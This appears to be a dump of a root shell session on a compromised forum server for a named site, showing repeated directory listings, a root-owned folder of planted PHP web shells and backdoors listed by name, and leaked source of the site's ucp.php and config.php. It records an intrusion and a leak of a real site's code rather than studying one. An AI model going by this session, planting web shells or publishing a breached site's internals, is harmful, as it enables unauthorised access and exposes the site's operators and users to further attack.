+-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
+-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
+-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
+-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
+drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
+-rw-r--r--  1 romeo romeo 46487316 May 23 04:07 stress_test.txt
+-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
+-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
+drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
+-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
+-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
+-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
+-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
+-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
+-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
+-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
+-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -la scripts/
+total 476
+drwxr-xr-x  2 romeo romeo   4096 Feb  7 13:38 .
+drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
+-rw-r--r--  1 romeo romeo   4770 Jan 13 12:11 builder.js
+-rw-r--r--  1 romeo romeo    588 Jan 13 12:11 cli.js
+-rw-r--r--  1 romeo romeo  35851 Jan 13 12:12 controls.js
+-rw-r--r--  1 romeo romeo  35253 Jan 13 12:11 dragdrop.js
+-rw-r--r--  1 romeo romeo  38986 Jan 13 12:12 effects.js
+-rw-r--r--  1 romeo romeo   8663 Feb 14 12:40 functions.js
+-rw-r--r--  1 romeo romeo   6897 Jan 13 12:11 growl.js
+-rw-r--r--  1 romeo romeo  63854 Jan 13 12:11 lightwindow.js
+-rw-r--r--  1 romeo romeo  52665 Jan 13 12:12 php.min.js
+-rw-r--r--  1 romeo romeo   1457 Jan 13 12:11 pm.js
+-rw-r--r--  1 romeo romeo   1637 Jan 13 12:11 pngfix.js
+-rw-r--r--  1 romeo romeo   3261 Jan 13 12:11 proto.menu.js
+-rw-r--r--  1 romeo romeo 130380 Jan 13 12:12 prototype.js
+-rw-r--r--  1 romeo romeo   2733 Jan 13 12:11 register.js
+-rw-r--r--  1 romeo romeo   2711 Jan 13 12:11 scriptaculous.js
+-rw-r--r--  1 romeo romeo    121 Jan 13 12:11 shoutbox.js
+-rw-r--r--  1 romeo romeo  10296 Jan 13 12:12 slider.js
+-rw-r--r--  1 romeo romeo   1920 Jan 13 12:12 sound.js
+-rw-r--r--  1 romeo romeo  20197 Jan 13 12:12 unittest.js
+-rw-r--r--  1 romeo romeo   6145 Feb 14 12:40 user.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -la shell/
+total 1564
+drwxr-xr-x  2 root  root    4096 May 20 14:30 .
+drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
+-rw-r--r--  1 romeo romeo   1297 Feb 16 21:05 ajan.txt
+-rw-r--r--  1 romeo romeo  44210 Feb 16 21:06 b64.txt
+-rw-r--r--  1 romeo romeo    140 Feb 16 21:06 backdoor.txt
+-rw-r--r--  1 romeo romeo  11141 Feb 16 21:06 c101.txt
+-rw-r--r--  1 romeo romeo   1468 Feb 16 21:06 cmd.txt
+-rw-r--r--  1 romeo romeo  18519 Feb 16 21:06 codeanalyzer.txt
+-rw-r--r--  1 romeo romeo 114861 Feb 16 21:06 constance.txt
+-rw-r--r--  1 romeo romeo  40682 Feb 16 21:06 CrystalShell v.1.txt
+-rw-r--r--  1 romeo romeo  83029 Feb 16 21:06 CyberSpy5.txt
+-rw-r--r--  1 romeo romeo  43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
+-rw-r--r--  1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
+-rw-r--r--  1 romeo romeo  39433 Feb 16 21:06 eko.txt
+-rw-r--r--  1 romeo romeo  38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
+-rw-r--r--  1 romeo romeo  24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
+PRiV8.txt
+-rw-r--r--  1 romeo romeo   2089 Feb 16 21:06 imageshell.JPG
+-rw-r--r--  1 romeo romeo   1768 Feb 16 21:06 index.php
+-rw-r--r--  1 romeo romeo  17440 Feb 16 21:06 kscript.txt
+-rw-r--r--  1 romeo romeo   2342 Feb 16 21:06 l0ger.txt
+-rw-r--r--  1 romeo romeo   1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
+-rw-r--r--  1 romeo romeo  33796 Feb 16 21:06 Mysql interface v1.0.txt
+-rw-r--r--  1 romeo romeo  34398 Feb 16 21:06 mysql.txt
+-rw-r--r--  1 romeo romeo  38856 Feb 16 21:06 ntdaddy.txt
+-rw-r--r--  1 romeo romeo 124953 Feb 16 21:06 r57.txt
+-rw-r--r--  1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
+-rw-r--r--  1 romeo romeo   7002 Feb 16 21:06 steg.txt
+-rw-r--r--  1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
+-rw-r--r--  1 romeo romeo  70402 Feb 16 21:06 webadmin.txt
+-rw-r--r--  1 romeo romeo   5057 Feb 16 21:06 WinX Shell.txt
+-rw-r--r--  1 romeo romeo   2455 Feb 16 21:06 Worse Linux Shell.txt
+-rw-r--r--  1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
+-rw-r--r--  1 romeo romeo  10418 Feb 16 21:06 XSSscan.py.txt
+-rw-r--r--  1 romeo romeo  10269 Feb 16 21:06 xx.txt
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# #ELEET
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -al
+total 47264
+drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
+drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
+-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
+-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
+-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
+drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
+drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
+-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
+-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
+-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
+drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
+-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
+-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
+-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
+-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
+-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
+-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
+-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
+-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
+drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
+-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
+-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
+drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
+-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
+-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
+-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
+-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
+-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
+drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
+-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
+-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
+-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
+-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
+-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
+-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
+-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
+-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
+drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
+-rw-r--r--  1 romeo romeo 46488303 May 23 04:08 stress_test.txt
+-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
+-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
+drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
+-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
+-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
+-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
+-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
+-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
+-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
+-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
+-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# cat test.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -la
+total 47264
+drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
+drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
+-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
+-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
+-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
+drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
+drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
+-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
+-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
+-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
+drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
+-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
+-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
+-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
+-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
+-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
+-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
+-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
+-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
+drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
+-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
+-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
+drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
+-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
+-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
+-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
+-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
+-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
+drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
+-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
+-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
+-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
+-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
+-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
+-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
+-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
+-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
+drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
+-rw-r--r--  1 romeo romeo 46488756 May 23 04:08 stress_test.txt
+-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
+-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
+drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
+-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
+-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
+-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
+-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
+-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
+-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
+-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
+-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# less ucp.php
+is_online){redirect("/".root()."index.php");}
+
+$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
+$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
+$switch = isset($_GET['action']) ? $_GET['action'] : '';
+
+$uid = $config['global']['user']['id'];
+if((int)isset($_GET['uid']) &&
+$_user->check_permissions($config['global']['user
+']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
+    $uid = (int)$_GET['uid'];
+}else{
+    $uid = $config['global']['user']['id'];
+ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# cd core
+root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
+core]# ls -al
+total 164
+drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 .
+drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 ..
+-rw-r--r--  1 romeo romeo   731 Jan 13 07:34 admin.js
+-rw-r--r--  1 romeo romeo 27395 Feb 18 09:08 base_functions.php
+-rw-r--r--  1 romeo romeo  9098 Feb 21 10:50 bbcode_tags.php
+-rw-r--r--  1 romeo romeo  2816 Feb  1 08:55 cacher.php
+drwxr-xr-x  4 romeo romeo  4096 Feb 10 13:29 classes
+-rw-r--r--  1 romeo romeo  1436 Feb  2 08:33 cli.php
+-rw-r--r--  1 romeo romeo  2848 Feb  8 08:46 config.php
+-rw-r--r--  1 romeo romeo 23810 Apr 19 16:45 core.php
+-rw-r--r--  1 romeo romeo  4518 Feb  1 08:55 cron.php
+drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 err
+-rw-r--r--  1 romeo romeo   236 Feb  2 08:33 force_user.php
+drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 functions
+-rw-r--r--  1 romeo romeo  1181 Feb  2 08:33 key.php
+-rw-r--r--  1 romeo romeo  6903 Feb  2 08:33 mailer.php
+drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 mint
+-rw-r--r--  1 romeo romeo  3054 Feb 14 06:17 page_footer.php
+-rw-r--r--  1 romeo romeo  5935 Feb 14 06:17 page_header.php
+-rw-r--r--  1 romeo romeo  9762 Feb  2 08:33 recaptchalib.php
+-rw-r--r--  1 romeo romeo  6658 Apr 26 07:51 security.php
+-rw-r--r--  1 romeo romeo  2021 Feb  2 08:33 usertracker.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
+core]# cat config.php
+config = $config;
+if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
+if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
+
+
+//Open the session stuff
+$_sess->sql = $_sql;
+$_sess->config = $config;
+
+//start the form class
+$_form = new form;
+
+//start the user class
+$_user = new user;
+$_user->config = $config;
+$_user->sql = $_sql;
+
+
+//start the login
+$_login = new login((isset($config['site']['autologin']) ? true : false));
+$_login->config = $config;
+$_login->sql = $_sql;
+$_login->form = $_form;
+$_login->sess = $_sess;
+$_login->user = $_user;
+$_user->login = $_login;
+
+//require($cms_root."core/key.php");
+
+//start the time class
+$_time = new time;
+$_time->config = $config;
+
+//start the bbcode class
+$_bbcode = new bbcode;
+$_bbcode->SetDebug(true);
+$_bbcode->SetDetectURLs(false);
+$_bbcode->SetURLPattern('{$text/h} External Link');
+$_bbcode->ClearSmileys();
+$_bbcode->SetSmileyDir('/'.root().'images/smilies');
+include($cms_root."core/bbcode_tags.php");
+
+$_bbcode->user = $_user;
+$_user->bbcode = $_bbcode;
+
+//start the cache && template classes
+$_cache_path = $cms_root."cache/";
+if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
+$_cache_ = (is_writable($_cache_path) ? true : false);
+$_cache = new Cache($_sql, $_cache_path, $_cache_);
+$_cache->config = $config['db'];
+
+//regenerate the site cache
+if($config!==NULL || !empty($config)){
+    $config_db = $_cache->generate_cache("config_db", "cache_config.php",
+"SELECT * FROM ".$config['db']['prefix']."config");
+    foreach($config_db as $array){
+	$config[$array['array']][$array['var']] = $array['value'];
+    }
+    unset($array,$config_db);
+}
+
+//start the template class
+$_template = new template('.', $_cache_, $_cache_path."files/");
+$_template->cms_root = $cms_root;
+$_template->user = $_user;
+
+$_login->template = $_template;
+
+//start the language class
+$_language = $config['site']['language'];
+if(isset($_SESSION['user']['language'])){
+   
+if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
+){
+	$_language = $_SESSION['user']['language'];
+    }
+}
+require($cms_root."language/".$_language."/main.php");
+$_time->cur_lang = $_language;
+
+//run the lang pass function on the language vars AFTER we included the base
+functions.
+foreach($_lang as $key => $value){
+	if(!is_array($_lang[$key])){
+		$_lang[$key] = lang_pass($_lang[$key]);
+	}
+}
+
+$_time->lang = $_lang;
+$_bbcode->lang = $_lang;
+$_login->lang = $_lang;
+//Include the security files.. recaptchalib maybe add into the login class
+require($cms_root."core/security.php");
+
+require($cms_root."core/classes/class.captcha.php");
+$_captcha = new Captcha($config['site']['captcha_pub'],
+$config['site']['captcha_priv']);
+
+$_cms_root = $cms_root;
+//Include the mailer
+require($cms_root."core/mailer.php");
+$cms_root = $_cms_root;
+
+/////////////////////////////////////////////////////////////////////////////
+//--Continue with the configuration----------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+define('ADMIN',     9);
+define('DEV',	    8);
+define('GMOD',	    7);
+define('MOD',	    5);
+define('USER',	    1);
+define('BANNED',    0);
+
+//add some stuff to the config
+
+//generate guest defaults
+$guest['user']['id'] = '0';
+$guest['user']['username'] = 'Guest';
+$guest['user']['theme'] = $config['site']['theme'];
+$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
+$_SESSION['user']['userkey'] : NULL;
+
+//generate user stuff
+$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
+: $guest['user']);
+$config['global']['ip'] = getIP();
+$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
+$_SERVER['HTTP_USER_AGENT'] : NULL);
+$config['site']['guests_online'] = (isset($guests_online) &&
+is_numeric($guests_online) ? $guests_online : 0);
+$config['site']['users_online'] = (isset($_users_online) &&
+is_numeric($_users_online) ? $_users_online : 0);
+$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
+: false;
+
+#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
+
+$tpl = $config['site']['theme'];
+if($config['site']['template_override']){
+    if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
+}else{
+	if(isset($config['global']['user']['template']) &&
+is_dir($cms_root."template/".$config['global']['user']['template']."/")){
+		$tpl = $config['global']['user']['template'];
+	}
+}
+$_template->config = $config;
+$_template->tpl = $tpl;
+
+//None of these should be defined as vars as they can be over writtin.. They
+are defines
+$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
+$config['site']['default_module']);
+$_user_temp = $cms_root."template/".$tpl."/";
+$_module_temp = $cms_root."modules/".$_module."/template/";
+
+if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
+	unset($_SESSION['login']);
+}
+
+$_template->set_rootdir($cms_root);
+
+define('IS_MOD',    $_user->check_permissions($config['global']['user']['id'],
+MOD));
+define('IS_GMOD',   $_user->check_permissions($config['global']['user']['id'],
+GMOD));
+define('IS_DEV',    $_user->check_permissions($config['global']['user']['id'],
+DEV));
+define('IS_ADMIN',  $_user->check_permissions($config['global']['user']['id'],
+ADMIN));
+
+/////////////////////////////////////////////////////////////////////////////
+//--Grab the neccesarry cache files----------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+//this defines which of the cache files to include
+//require($cms_root.'core/cacher.php');
+
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cacher.php-------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
+'user_permissions', NULL);#'badwords', 'affiliates',
+$x=0;
+include($cms_root."cache/cache.php");
+while($var = $cache_gen[$x]){
+    if($var != ''){
+	$gen = NULL;
+	    eval('$gen = $'.$var.'_db;');
+
+	    /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
+		include($cms_root."cache/cache_".$var.".php");
+		eval('$gen = $'.$var.'_db;');
+		}*/
+		if ($gen !== NULL || !empty($gen)){
+			foreach($gen as $k => $v){
+		    $config[$var][$k] = $v;
+		}
+		}else{
+		//regenerate the cache if not avalible
+		    switch($var){
+		    case 'config':
+			$config[$var] = $_cache->generate_cache("config_db",
+"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
+		    break;
+		    case 'minimenu':
+			$config[$var] = $_cache->generate_cache("minimenu_db",
+"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
+disporder ASC");
+		    break;
+
+		    case 'menu':
+			$config[$var] = $_cache->generate_cache("menu_db",
+"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
+ASC", NNUM);
+:
+		    break;
+
+		    case 'statistics':
+			$config[$var] = $_cache->generate_statistics_cache();
+		    break;
+
+		    case 'groups':
+			$config[$var] = $_cache->generate_cache("groups_db",
+"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
+rank DESC");
+		    break;
+		    case 'bans':
+			$config[$var] = $_cache->generate_cache("bans_db",
+"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
+		    break;
+		    //case 'affiliates':
+		    //	  $config[$var] =
+$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
+".$config['db']['prefix']."affiliates");
+		    //break;
+		    //case 'module_permissions':
+		    //	  $config[$var] =
+$_cache->generate_cache("module_permissions_db",
+"cache_module_permissions.php", "SELECT * FROM
+".$config['db']['prefix']."module_permissions");
+		    //break;
+		    case 'user_permissions':
+			$config[$var] = $_cache->generate_upermissions_cache();
+
+		    break;
+		}
+
+	}
+	}
+	$x++;
+}
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cacher.php-------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+
+$_user->groups = $config['groups'];
+//$_user->module_permissions = $config['module_permissions'];
+$_user->permissions = $config['user_permissions'];
+
+/////////////////////////////////////////////////////////////////////////////
+//--Cron - This will sort the majority of the cache and--------------------//
+//---------db problems out for us------------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+
+//include($cms_root.'core/cron.php');
+
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cron.php---------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+if(!defined('NO_DB')){
+    $hourly_cron = FALSE;
+    if(isset($config['site']['hourly_time'])){
+	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
+		$_sql->updateRow("statistics", array('value' => time()),
+"variable = 'hourly_cron'");
+		$hourly_cron = TRUE;
+	} else {
+		if($config['site']['hourly_time'] == 0){
+			$hourly_cron = TRUE;
+		}else{
+			if((time() - $config['site']['hourly_time']) > 
+$config['statistics']['hourly_cron']){
+				$_sql->updateRow("statistics", array('value' =>
+time()), "variable = 'hourly_cron'");
+				$hourly_cron = TRUE;
+			}
+:
+		}
+	}
+    }
+
+    $daily_cron = FALSE;
+    if(isset($config['site']['daily_time'])){
+	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
+		$_sql->updateRow("statistics", array('value' => time()),
+"variable = 'daily_cron'");
+		$daily_cron = TRUE;
+	} else {
+		if($config['site']['daily_time'] == 0){
+			$daily_cron = TRUE;
+		}else{
+			if((time() - $config['site']['daily_time']) > 
+$config['statistics']['daily_cron']){
+				$_sql->updateRow("statistics", array('value' =>
+time()), "variable = 'daily_cron'");
+				$daily_cron = TRUE;
+			}
+		}
+	}
+    }
+
+    $weekly_cron = FALSE;
+    if(isset($config['site']['weekly_time'])){
+	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
+		$_sql->updateRow("statistics", array('value' => time()),
+"variable = 'weekly_cron'");
+		$weekly_cron = TRUE;
+	} else {
+		if($config['site']['weekly_time'] == 0){
+			$weekly_cron = TRUE;
+		}else{
+			if((time() - $config['site']['weekly_time']) > 
+$config['statistics']['weekly_cron']){
+				$_sql->updateRow("statistics", array('value' =>
+time()), "variable = 'weekly_cron'");
+				$weekly_cron = TRUE;
+			}
+		}
+	}
+    }
+}
+
+$stat_cache = false;
+if(!defined('NO_DB')){
+	if($hourly_cron){
+	    $_sql->record_message('Hourly CRON is running');
+		//delete users from sql that are inactive and set users offline
+that are inactive too
+		$_sql->query("UPDATE shr_users
+	    SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
+cs_online.uid = shr_users.id)
+	    WHERE EXISTS
+	      ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
+shr_users.id)");
+		$_sql->deleteRow('online', "login_time <
+".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
+".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
+		$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
+"66.249%"');
+		$_cache->generate_statistics_cache();
+		$stat_cache = true;
+
+	}
+
+	if($daily_cron){
+	    $_sql->record_message('Daily CRON is running');
+		//update caches
+		if(!$stat_cache){
+		$_cache->generate_statistics_cache();
+		$stat_cache = true;
+:
+	}
+
+	if($config['forum']['auto_lock']){
+	    //Auto Lock Thread Timer
+	    $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
+'', 1);
+	    $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
+<= $ex", 1);
+	}
+
+	$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
+expire < ".time()."");
+
+		$_cache->generate_upermissions_cache();
+	$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
+FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
+		$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
+FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
+	    //$_cache->generate_cache("module_permissions_db",
+"cache_module_permissions.php", "SELECT * FROM
+".$config['db']['prefix']."module_permissions");
+
+	}
+
+	if($weekly_cron){
+	    $_sql->record_message('Weekly CRON is running');
+		if(!$stat_cache){
+		$_cache->generate_statistics_cache();
+		$stat_cache = true;
